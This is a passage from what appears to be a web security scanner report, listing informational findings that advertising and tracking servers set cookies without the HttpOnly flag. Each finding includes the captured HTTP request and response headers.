X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:04:09 GMT
Last-Modified: Tue, 10 May 2011 14:04:09 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www152
Content-Length: 0
Content-Type: text/plain


10.74. http://js.revsci.net/gateway/gw.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=B08725 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=MLvv9S8pLipr557J8SLcZtVsmYkpAEXfo4IXeAwquSQJS8LV1VT8e1Zf6ZL0ipL7+Kv8z8r9D7fsUFw2wl//IozSp/8YSn4NoHt7l4lq67B2aoTPJY8n/+xt25rkTM9DypP80PyOiYjfBswa/pIttQtABtvQCQc7lE2X5pTLFZly4Ho5X9JogRIv1r4DXxDUgTm31I6TxvuOcKmC/jYW5QMM3ruvTFdWWnnYKoLzU3RqHt1B+4whuE8KiYvSu8fekjRlh6End7IYoakFzgGNwXmFrORt0i1PnlcgwYHAVmdPZXPwfj5PC8fpo6ePf9KPHjtwKnWToMgc1VOatjJzghlFb3uJy+CLp/aBgvIyCGSTh51tY1Rvo4CkU9g/q/BgAxiXtL0sZoKDGnOR57czbWPW2snLVyHjK8qHn9sPGC4471fRIsWCpDXisem0f73E/ZYqkXVnZ4eygMLCHxTcBqIFjqQ0lsGEWtcVVk6WNz4l/Mewn91yb5z3TrGC94Ds0PI7lNEQ/zX+w65QliR9XUWQCR8ZJ0KoPYLJ9vKECY7qypI6JWsG/I/UnSODO2U2xhEoKpLlUINw4H3LIXL7g6gXRfai+Kt4E8gxorg1GKtpOngk4XZcT/94VjxqfHAdrOWtgThQIScl4PM9S4OeVp/AqIwVnD6+9/f77+K5aAauldE+R8qVL3mLN9jE87ZIwkWFl/denYCiK7nCJMMh1mWgtylCdkQLhvem5lL4df6OLCQDdqc2pKs/GXndlZ3eSYBP0hxu1BnT5DxxhgDCxWfzaPkEL58Qj+an9Z2aEd3idnm9kJYYUNJXJ7k1eWZB8XIaWBu+Og4PPbxN05GLrobjeAUr3OiEIqdhdgihq0P409GFU13gTUwlVlsfcu1/EYFLl0DER7k8wuY7faIt3xwOz+kc7xzOK8j7xSKy7XkKoBrIez+xK8rK00qfWaMiid3qLFhWrV7Z0YRVD5Tck40LehukJyUqz+nbRS+1uvi7svDbyhjMyqPcCeWYkKKYfULldUIH1bm8Pcz4+/tvOMe7uidWEFgdWhJeXvxXPLSHRZrYtO9j8Cnaw
+R2Jc/MYSEsxo3ftJNSE1AGqd9z1IsgiJ9z5QHadxQxwsqAEgg6YrnJl7ALbsXv8caoArA7zp4fZgZtJCtxWzgclo/7zoUxCFNN/D3OGdAuyZRM4XrAxVRNGqCYmJ96huN4wxe1DAwK7D5sZ6NhmnsBvsQtpyPchz5bXwM1e1FZ05RNiXv3wbRaF4aMDm+j2wVHWV6B43cndwQ8fv7QzGvQMJpqcAx4rw==; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; rsi_us_1000000="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"
If-Modified-Since: Mon, 02 May 2011 20:22:43 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=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; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:31 GMT; Path=/
Last-Modified: Mon, 09 May 2011 13:59:31 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 09 May 2011 14:59:31 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:30 GMT
Content-Length: 5035

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'B08725';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

10.75. http://latent.alvenda.net/Latent.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://latent.alvenda.net
Path:   /Latent.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Latent.html?cn=impression_5lnsx9b4_RubiconRemarketing_ThomsonReuters&cv=%2C%2Ctr1%2Calvendathomsonreuters%2Cwww.thevine.com.au%2Chttp%3A//alvenda-tags.s3.amazonaws.com%2Crubicon HTTP/1.1
Host: latent.alvenda.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:01 GMT
Content-Type: text/html
P3P: CP="NON DSP TAIa PSAa PSDa IVAa IVDa OUR IND UNI"
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: impression_5lnsx9b4_RubiconRemarketing_ThomsonReuters=_,,tr1,alvendathomsonreuters,www.thevine.com.au,http://alvenda-tags.s3.amazonaws.com,rubicon;Version=1;Path=/;Max-Age=2592000
Content-Length: 0
Server: Jetty(6.1.22)


10.76. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,51134,50086,50085,53380,60490,60512,50963,52615,60491,50507,53656,55401,60509,57094,50961,52841,51182,56419,54032,51186,56988,56673,56148,57362,56969,60203,56835,56987,56780,50220,56768,56299,56761,54057,56681&guidm=1:16r4opq1tvlkml&bnum=23230 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=MzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; GUID=MTMwNDkwMjg2MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 14:59:55 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

10.77. http://media.adfrontiers.com/pq

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.adfrontiers.com
Path:   /pq

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below):

af

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pq?t=j&s=923&ac=5&at=1&xvk=60302672.07185271 HTTP/1.1
Host: media.adfrontiers.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tc=1; af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:-"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 01 Jan 2000 00:00:00 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: af="3|!RglRcjj3oVAzGl,hfn!gk!!77,-1066|3142|618|1|1304340985980|26|3|0:349|2477|618|1|1304340397914|26|3|0:349|1148|1484|1|1304949605794|25|2|0:-"; Version=1; Domain=media.adfrontiers.com; Max-Age=2592000; Path=/
Content-Type: application/javascript
Content-Length: 252
Date: Mon, 09 May 2011 14:00:05 GMT
Connection: close

document.write('<iframe height=90 width =728 hspace=0 vspace=0 frameborder=0 marginheight=0 marginwidth=0 scrolling=no src="http://media.adfrontiers.com/pq?t=f&s=923&ts=1304949605791&cm=1148&ac=5&at=1
...[SNIP]...

10.78. http://newspaper.app40.ur.gcion.com/GCION.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newspaper.app40.ur.gcion.com
Path:   /GCION.ashx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below):

rsi_segs

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GCION.ashx?q=5&Segment=D08734_70008%7CD08734_72078&CacheDefeat=1304949583122 HTTP/1.1
Host: newspaper.app40.ur.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rsi_segs=D08734_70008|D08734_72078; domain=.gcion.com; expires=Tue, 08-May-2012 13:59:45 GMT; path=/
Cache-Control: private
Content-Length: 0


10.79. http://oads.mochila.com/openx/www/delivery/ajs.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oads.mochila.com
Path:   /openx/www/delivery/ajs.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

OAGEO
OAID

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /openx/www/delivery/ajs.php?source=mochila_live&zoneid=167&mmadsize=300_140&widget=IBDtout&buyerId=OrlandoSentinel&destination=1596&cb=081922772 HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: text/javascript; charset=UTF-8
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; path=/
Set-Cookie: OAID=9eb743ef8885d18c9cf09de695a0ce63; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 1532

var OX_39787ffc = '';
OX_39787ffc += "<"+"script type=\"text/javascript\">\n";
OX_39787ffc += "RD = top.location.href.substr(7,top.location.href.indexOf(\'/\',7)-7);\n";
OX_39787ffc += "var _mbuyerId
...[SNIP]...

10.80. http://oads.mochila.com/www/delivery/lg.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oads.mochila.com
Path:   /www/delivery/lg.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below):

OAID

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /www/delivery/lg.php?bannerid=1051&campaignid=185&zoneid=167&source=mochila_live&loc=1&referer=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&cb=b547bcc71c HTTP/1.1
Host: oads.mochila.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAGEO=US%7C%7C%7C%7C601.5168%7C601.5195%7C%7C%7C%7C%7C; OAID=a390bfc358a9e03af3a7c9a7a6945d79

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
Cache-Control: private, max-age=0, no-cache
Content-Type: image/gif
P3P: CP="CUR ADM OUR NOR STA NID"
Date: Mon, 09 May 2011 13:59:37 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Connection: Keep-Alive
Set-Cookie: OAID=a390bfc358a9e03af3a7c9a7a6945d79; expires=Tue, 08-May-2012 13:59:37 GMT; path=/
X-Powered-By: PHP/5.1.6
Content-Length: 43

GIF89a.............!.......,...........D..;

10.81. http://odb.outbrain.com/utils/odb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

obuid
_lvs2
_lvd2
_rcc2
recs

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:34 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:34 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: recs="FV47GVeXROTRQDQGso7n7BJgimfU4hutZsi+REu/kRSXRrfTy1nLEJ07hVMifX9qva0UddJWrWk="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:34 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:33 GMT
Content-Length: 3991

GEL.thepage.pageinfo.outbrain.init({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1f9a95338cac93e0d7953f1aee6ee9d4'},'score':{'prefe
...[SNIP]...

10.82. http://openx2-match.dotomi.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://openx2-match.dotomi.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set (see the Set-Cookie header in the response below):

Apache

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: openx2-match.dotomi.com
Proxy-Connection: keep-alive
Referer: http://www.surphace.com/ads/rubicon_orlandosentinel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 204 No Content
Date: Mon, 09 May 2011 14:00:11 GMT
X-Name: rtb-s04
Set-Cookie: Apache=173.193.214.243.1304949611489462; path=/
Cache-Control: max-age=0, no-store
Content-Type: image/gif
Content-Length: 0
Connection: close


10.83. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

rdk
rdk15
ses15
csi15

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949889^1304949889&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...

10.84. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set (see the Set-Cookie headers in the response below):

rdk
rdk2
ses2
csi2

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
